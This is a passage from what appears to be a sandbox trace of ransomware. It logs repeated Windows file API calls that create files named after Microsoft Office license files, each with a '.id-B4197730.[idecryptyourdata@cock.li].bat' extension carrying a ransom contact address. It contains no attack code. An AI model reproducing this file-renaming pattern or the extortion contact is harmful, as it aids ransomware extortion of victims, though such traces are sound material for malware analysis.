Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.896] CloseHandle (hObject=0x51c) returned 1 [0163.896] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.896] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.897] CloseHandle (hObject=0x51c) returned 1 [0163.897] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.897] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.897] CloseHandle (hObject=0x51c) returned 1 [0163.898] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.898] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.899] CloseHandle (hObject=0x51c) returned 1 [0163.899] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.899] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.900] CloseHandle (hObject=0x51c) returned 1 [0163.900] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.900] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.900] CloseHandle (hObject=0x51c) returned 1 [0163.901] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.901] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.901] CloseHandle (hObject=0x51c) returned 1 [0163.902] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.902] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.902] CloseHandle (hObject=0x51c) returned 1 [0163.903] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.903] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.904] CloseHandle (hObject=0x51c) returned 1 [0163.904] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.904] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.905] CloseHandle (hObject=0x51c) returned 1 [0163.905] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.905] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.906] CloseHandle (hObject=0x51c) returned 1 [0163.907] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.907] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.907] CloseHandle (hObject=0x51c) returned 1 [0163.908] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.908] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.908] CloseHandle (hObject=0x51c) returned 1 [0163.909] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.909] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.909] CloseHandle (hObject=0x51c) returned 1 [0163.910] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.910] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteFreeR_Bypass-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenotefreer_bypass-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.910] CloseHandle (hObject=0x51c) returned 1 [0163.911] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.911] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.911] CloseHandle (hObject=0x51c) returned 1 [0163.912] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.912] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.912] CloseHandle (hObject=0x51c) returned 1 [0164.193] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.193] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OneNoteR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\onenoter_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.193] CloseHandle (hObject=0x52c) returned 1 [0164.194] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.194] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.194] CloseHandle (hObject=0x52c) returned 1 [0164.195] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.195] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.196] CloseHandle (hObject=0x52c) returned 1 [0164.196] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.196] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.197] CloseHandle (hObject=0x52c) returned 1 [0164.197] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.197] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.198] CloseHandle (hObject=0x52c) returned 1 [0164.198] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.198] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.199] CloseHandle (hObject=0x52c) returned 1 [0164.199] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.199] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.200] CloseHandle (hObject=0x52c) returned 1 [0164.200] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.201] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.201] CloseHandle (hObject=0x52c) returned 1 [0164.202] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.202] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.202] CloseHandle (hObject=0x52c) returned 1 [0164.203] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.203] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.203] CloseHandle (hObject=0x52c) returned 1 [0164.204] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.204] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.204] CloseHandle (hObject=0x52c) returned 1 [0164.205] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.205] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.206] CloseHandle (hObject=0x52c) returned 1 [0164.206] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.206] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.207] CloseHandle (hObject=0x52c) returned 1 [0164.207] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.208] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.208] CloseHandle (hObject=0x52c) returned 1 [0164.209] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0164.209] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 